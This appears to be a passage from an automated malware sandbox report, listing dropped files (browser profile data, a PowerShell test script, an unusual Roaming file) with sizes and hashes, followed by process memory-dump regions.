C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

Filesize
293B

MD5
f22256fcc3d3a753758ef1d4efb9b5b2

SHA1
33cb8021bacf9674f67c77507b4f53a85bda0c5d

SHA256
2edfcf5831e4765aa8057dd1d13b7b96ff02dcdf267f4431633703dffa0f133a

SHA512
7193535913e6838fcb0c2aaa3b1f322df61f15e056cc257e622db0d16a0b190cc37b4e79636798a8d7a459abf455bbc426f4f2045d85ac85c34668d81e501ca7

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

Filesize
46B

MD5
90881c9c26f29fca29815a08ba858544

SHA1
06fee974987b91d82c2839a4bb12991fa99e1bdd

SHA256
a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

SHA512
15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

Filesize
269B

MD5
e3115dd8137a25bec397988d5fd032c9

SHA1
ff33fbb438f8c34420679c854b8169c9caa26548

SHA256
4b0a18f9d80d94ff4d322f3f8256c5216523b628fa146f889b871910739d1011

SHA512
bf837a48e67bd268ec172cc5ca6e4960a24134a9af7e9918380d631384736fa798d99bc98a28109184067d5727d98f6b8a925869e3dfd3dfe0bc880f901bd0e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

Filesize
20KB

MD5
986962efd2be05909f2aaded39b753a6

SHA1
657924eda5b9473c70cc359d06b6ca731f6a1170

SHA256
d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889

SHA512
e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

Filesize
128KB

MD5
8af2cd3136117420d27fd89a94d989c1

SHA1
ecc2d4d05d100cf8c6768dab22bb2d4f620d620e

SHA256
08de26bd486cbb6fa7e78abab15222954a115d58ef54df677ba7e5620c3748a0

SHA512
74b1a9bddbee8f31bc38e3160ce230bb448ee31a3fc727fdd470d5996f5f87e72e93551710be70b9ac8c19455b7e90c482ecfc11465efe6be8fb48ed2cf5b8c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

Filesize
114KB

MD5
d835f68809e724aea64264eeb5e98b4a

SHA1
4540d6e6abc73f7b6887a34386f92f776f7892ae

SHA256
69bf00e7f2f81edaffc8c310f14341a3bc19f185edb11bfe7754a49f019150d9

SHA512
46969e3d718e921849f3854b767255871f1a701e698601d6915fc185374a9b197660c08ef9ee148605b99e2a2b4909f79c5193d1fbbac95a792e280b34faf666

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

Filesize
4KB

MD5
f63c71c693c4e73ea102b774db17210d

SHA1
02c9c2a37df2d3585dfed82c333cc985b173e32d

SHA256
60b5d80f2e4d3375973660bcdf7ad9fc75fc6370339edb5201bc3f30443ddca0

SHA512
6d0fb091c7aa6730f325d3efded6e1dc277dd9c98519c52651c6e3be3769e1bde050d78fb6f1096420a0b062adff01475a4b361cbd1248297da0650e9d8be5e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

Filesize
263B

MD5
30740af726a86f4a53138f37bb50da5d

SHA1
30c383c3f68a9b99b326020d23d4866e0a947d6b

SHA256
070c132bcc58422d642157fee6321e69f798a9957c88ad9c1fd05c484e1cf67d

SHA512
ff817f79fa1e11399f44b3ca253bb437ea278000c8b2f06d062b85d4bf90e4b5e59028a5bec0b609a0e72bf725ba77485f7f5865bc61e614e5dca16acdb91c65

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

Filesize
682B

MD5
6a80d6c6377e79c6374609cbe399c24a

SHA1
c5262d9e0efd27b8923ed789b3bb0dec9dd1e510

SHA256
5b1ad7ae244608ef0ca1aa119828514b21ec90676b1bae0d9f548dfd65d697ad

SHA512
e9cf197b29b95b77ac23d52f830cd44050cd6f3cea92c75b46c5266f31a99b473ba49833a6f7aec0a0bc3db81427f3d9a1a43ade118e9a77d14385086bb0ec4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

Filesize
283B

MD5
7e070e3b319e3c1d04d6dd545a85cb9f

SHA1
00fc91d13012f17c234aa62af1f35c7c65e73cdb

SHA256
d7bee5891533163fb901cde72d701d26b5ea2b847601d51df015c9bc32aee440

SHA512
80d6ee7816b10e0259745e589ab04b88ab06c737138a37e9338346d144fcf57f1ceb4a0e49a32d1403d977481cbf5ce1024237df4fe006c1b6b28c8d167bec8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
8KB

MD5
552f923f27a961f729ca45a9b10a8275

SHA1
389538346f6619b0827cd4284f48b2d5d263c2f5

SHA256
da2cf30f2fb669439fa07cf315e92bbb0dda8f5158a68cf774e5c12280b08690

SHA512
61e83217db32fdeece830e317e2cb12d9af2a30a1cc8ec5266b0438456026c75a02080eab6e6b2fc1d322f60256db4f9899b77c9fd789200176665b037747904

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
116KB

MD5
ee935c3df261cd10abc2269526f5adc3

SHA1
cc1a4b47c34c61313da14e9fdf5af164762c9ed2

SHA256
37d156eaedb6a2fbe891cd682dd625a3261449f5619de7900a51be205b3f0418

SHA512
9e0f2fadab3f2e1edda24050041a996e9ba4a94b32bdb73192e9d9e995b10f2d66164d0aa6fcb90984599b402c92110bfa3f20fc56dc4731cd42edf3eaf5404c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nr2yibku.zye.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lfnqmr

Filesize
4KB

MD5
bc25ccf39db8626dc249529bcc8c5639

SHA1
3e9cbdb20a0970a3c13719a2f289d210cdcc9e1d

SHA256
b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904

SHA512
9a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a

Download Submit
C:\Users\Admin\AppData\Roaming\Vexable.baa

Filesize
427KB

MD5
377966aad2fd724c60788899f083b260

SHA1
eab266c42af46cd10d5147a8749c25f7398d6de3

SHA256
7c6ddbe7e10a5d51e08e86c7ab7663d1f779f1ccd0672d43c8c7362776dee8ab

SHA512
a6ab4122744f4a6fe37a10f182ac1d7e02b04dfeaf8a69d7e7a8344a2bed777b84e7611950baf86265ccaed4536fb6f39f8b474870beb48403cbda493c7a8946

Download Submit
memory/1120-19-0x00007FFBF6A53000-0x00007FFBF6A55000-memory.dmp

Filesize
8KB

Download
memory/1120-15-0x00007FFBF6A50000-0x00007FFBF7511000-memory.dmp

Filesize
10.8MB

Download
memory/1120-14-0x0000023DFDC30000-0x0000023DFDC52000-memory.dmp

Filesize
136KB

Download
memory/1120-24-0x00007FFBF6A50000-0x00007FFBF7511000-memory.dmp

Filesize
10.8MB

Download
memory/1120-16-0x00007FFBF6A50000-0x00007FFBF7511000-memory.dmp

Filesize
10.8MB

Download
memory/1120-4-0x00007FFBF6A53000-0x00007FFBF6A55000-memory.dmp

Filesize
8KB

Download
memory/1120-20-0x00007FFBF6A50000-0x00007FFBF7511000-memory.dmp

Filesize
10.8MB

Download
memory/1120-23-0x0000023DFD8E0000-0x0000023DFDAFC000-memory.dmp

Filesize
2.1MB

Download
memory/1672-198-0x000000001F260000-0x000000001F279000-memory.dmp

Filesize
100KB

Download
memory/1672-224-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-373-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-379-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-382-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-74-0x000000001E9A0000-0x000000001E9D4000-memory.dmp

Filesize
208KB

Download
memory/1672-73-0x000000001E9A0000-0x000000001E9D4000-memory.dmp

Filesize
208KB

Download
memory/1672-70-0x000000001E9A0000-0x000000001E9D4000-memory.dmp

Filesize
208KB

Download
memory/1672-66-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-62-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-388-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-376-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-370-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-364-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-385-0x0000000000E00000-0x0000000002054000-memory.dmp

Filesize
18.3MB

Download
memory/1672-201-0x000000001F260000-0x000000001F279000-memory.dmp

Filesize
100KB

Download
memory/1672-202-0x000000001F260000-0x000000001F279000-memory.dmp

Filesize
100KB

Download
memory/3148-85-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3148-88-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3148-83-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3148-82-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4508-49-0x00000000087F0000-0x000000000918C000-memory.dmp

Filesize
9.6MB

Download
memory/4508-43-0x0000000007610000-0x0000000007C8A000-memory.dmp

Filesize
6.5MB

Download
memory/4508-26-0x0000000004F10000-0x0000000005538000-memory.dmp

Filesize
6.2MB

Download
memory/4508-25-0x00000000024B0000-0x00000000024E6000-memory.dmp

Filesize
216KB

Download
memory/4508-28-0x00000000055E0000-0x0000000005646000-memory.dmp

Filesize
408KB

Download
memory/4508-29-0x0000000005660000-0x00000000056C6000-memory.dmp

Filesize
408KB

Download
memory/4508-39-0x0000000005890000-0x0000000005BE4000-memory.dmp

Filesize
3.3MB

Download
memory/4508-41-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

Filesize
120KB

Download
memory/4508-42-0x0000000005E00000-0x0000000005E4C000-memory.dmp

Filesize
304KB

Download
memory/4508-27-0x0000000005540000-0x0000000005562000-memory.dmp

Filesize
136KB

Download
memory/4508-44-0x0000000006360000-0x000000000637A000-memory.dmp

Filesize
104KB

Download
memory/4508-45-0x0000000007030000-0x00000000070C6000-memory.dmp

Filesize
600KB

Download
memory/4508-46-0x0000000006FD0000-0x0000000006FF2000-memory.dmp

Filesize
136KB

Download
memory/4508-47-0x0000000008240000-0x00000000087E4000-memory.dmp

Filesize
5.6MB

Download
memory/4796-87-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4796-90-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4796-89-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/5112-91-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/5112-96-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/5112-95-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download